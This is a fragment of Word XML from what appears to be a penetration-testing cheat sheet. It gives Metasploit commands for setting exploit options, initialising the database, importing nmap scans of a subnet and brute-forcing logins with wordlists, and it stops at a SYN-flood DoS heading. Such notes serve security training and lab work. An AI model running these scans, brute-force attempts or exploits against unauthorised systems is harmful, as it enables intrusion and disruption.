              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set LPORT </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>OUR MACHINE PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="4A6BF360" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0F7C3AA0" w14:textId="21B0AB96" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2BE1D3C2" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="118585D5" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">run </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit </w:t>
            </w:r>
            <w:r>
              <w:t>when everything is ready.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="785BC7E8" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A649027" w14:textId="2BF4DA35" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6EFAFFAF" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E2FBC69" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>Additional options can also be set if credentials are required:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00972831">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set PASSWORD</w:t>
            </w:r>
            <w:r w:rsidRPr="00972831">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00972831">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00972831">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set USERNAME </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00972831">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set TARGETURI </w:t>
            </w:r>
            <w:r w:rsidRPr="00972831">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/WEBPAGENAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EB7395">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>lcd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB7395">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/home/USERNAME/Downloads</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>This will change local directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="63855228" w14:textId="77777777" w:rsidTr="0028087A">
        <w:trPr>
          <w:trHeight w:val="564"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7410FF39" w14:textId="751C9CF5" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B1C15EF" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Terminal Command</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(update)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F823EC7" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>To update the msfconsole, use the following command from the terminal:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12AF20AD" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D146DD">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00D146DD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt install </w:t>
            </w:r>
            <w:r w:rsidRPr="00D146DD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>metasploit-framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="75776951" w14:textId="77777777" w:rsidTr="0028087A">
        <w:trPr>
          <w:trHeight w:val="1596"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0CADA30C" w14:textId="5394BE23" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C54C704" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Terminal Command</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Initiate msf database)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B63E57A" w14:textId="77777777" w:rsidR="0028087A" w:rsidRPr="00754958" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r w:rsidRPr="00754958">
              <w:t>To initiate the database, type and hit enter with:</w:t>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfdb</w:t>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>init</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>service</w:t>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">postgresql </w:t>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>restart</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2267716F" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r w:rsidRPr="00754958">
              <w:t>Then, open msfconsole and check the status in msfconsole using:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00754958">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>db_status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="1806AC59" w14:textId="77777777" w:rsidTr="0028087A">
        <w:trPr>
          <w:trHeight w:val="1596"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="011038E6" w14:textId="55D1F709" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66637564" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(using nmap with msf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="109B731F" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">Once you have initiated the database (see 71.g), you can run </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> nmap scan within msfconsole using the same commands using for nmap (see 41 and 42).</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Be sure to add </w:t>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-oX</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> as a flag within the command, for example:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-Pn -sS -A -oX </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A12266">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.0/24</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Once you have ran the nmap scan, this will save the results to ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:t>’, a new file. Next, we need to import these nmap results using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">db_import </w:t>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369C1985" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">Next, we type </w:t>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">hosts </w:t>
            </w:r>
            <w:r>
              <w:t>to see a list of active hosts along with their MAC addresses, OS names, etc. (This command will reveal more as more information is scanned for.)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Next, we type </w:t>
            </w:r>
            <w:r w:rsidRPr="00085851">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">services </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to see a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of the services running on the active hosts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8BD212" w14:textId="77777777" w:rsidR="0028087A" w:rsidRPr="00754958" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t xml:space="preserve">You can check for SMB or Samba versions (if they are open) and ftp versions (if ftp is available) by searching for and using the module within msf, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="008C7A16">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">search </w:t>
            </w:r>
            <w:r w:rsidRPr="008C7A16">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>smb_version</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="0C5264F6" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="530E8176" w14:textId="3C57336F" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00273CC0">
              <w:t>i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E896F5F" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="298271BF" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:r>
              <w:t>To brute force a username and password, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>user_file</w:t>
            </w:r>
            <w:r w:rsidRPr="00237A80">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ~/</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Desktop/user.txt</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">pass_file </w:t>
            </w:r>
            <w:r w:rsidRPr="00237A80">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/root</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/Desktop/pass.txt</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Don’t forget to ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r>
              <w:t>’ the exploit you need first and ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’ the </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>RHOSTS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3A6B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>RPORT</w:t>
            </w:r>
            <w:r>
              <w:t>, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00273CC0" w14:paraId="3871896D" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D50E4C7" w14:textId="23CDAE3E" w:rsidR="00273CC0" w:rsidRDefault="00273CC0" w:rsidP="0028087A">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="536589A6" w14:textId="2BDA201F" w:rsidR="00273CC0" w:rsidRDefault="00273CC0" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(synflood DoS attack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
